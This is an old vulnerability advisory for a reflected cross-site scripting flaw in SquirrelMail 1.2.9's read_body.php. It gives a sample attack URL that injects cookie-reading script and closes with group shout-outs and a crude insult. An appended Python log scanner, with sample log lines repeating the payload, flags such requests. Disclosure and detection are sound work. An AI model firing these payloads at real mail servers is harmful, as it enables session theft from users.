=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: SquirrelMail v1.2.9 XSS bugs
product: SquirrelMail v1.2.9
vendor: www.squirrelmail.org
risk: low
date: 12/3/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/008.txt
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

description
-----------
when reading an email, scripting code can be inserted. read_body.php
does not filter user input in the `mailbox' and `passed_id' variables.

btw, v1.2.10 was released today. i don't know if this version
contains this xss.

sample attack
-------------
http://hostname/src/read_body.php?mailbox=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&
startMessage=1&show_more=0

[it must be in a single string]

a string that is not URL-encoded also works fine.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all russian
security guyz!!
fuck_off: slavomira and other dirty ppl in *.kz

================
im not a lame,
not yet a hacker
================
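
A log check for the request pattern described above, added here as an example and not part of the original advisory: it flags read_body.php requests whose `mailbox` or `passed_id` values contain angle brackets after URL decoding. The access-log format, the sample lines and the rule that passed_id should be a numeric message id are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names as unfiltered in read_body.php.
WATCHED = ("mailbox", "passed_id")
# Heuristic: angle brackets are not expected in either value.
MARKUP = re.compile(r"[<>]")
# Request target inside a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (addresses are documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Dec/2002:10:00:01 +0000] "GET /src/read_body.php'
    '?mailbox=INBOX&passed_id=42&startMessage=1&show_more=0 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [03/Dec/2002:10:02:13 +0000] "GET /src/read_body.php'
    '?mailbox=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E'
    '&passed_id=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E'
    '&startMessage=1&show_more=0 HTTP/1.1" 200 4977',
    '192.0.2.78 - - [03/Dec/2002:10:05:40 +0000] "GET /src/read_body.php'
    '?mailbox=INBOX&passed_id=7x&startMessage=1&show_more=0 HTTP/1.1" 200 4801',
]

def inspect_request(target):
    """Return (parameter, reason) findings for one request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/read_body.php"):
        return []
    findings = []
    # parse_qs percent-decodes values, so encoded and raw forms look alike.
    query = parse_qs(parts.query, keep_blank_values=True)
    for name in WATCHED:
        for value in query.get(name, []):
            if MARKUP.search(value):
                findings.append((name, "markup characters"))
            elif name == "passed_id" and not value.isdigit():
                # Assumption: passed_id is a numeric message id.
                findings.append((name, "non-numeric value"))
    return findings

def scan(lines):
    """Return [(line_number, findings)] for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        findings = inspect_request(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```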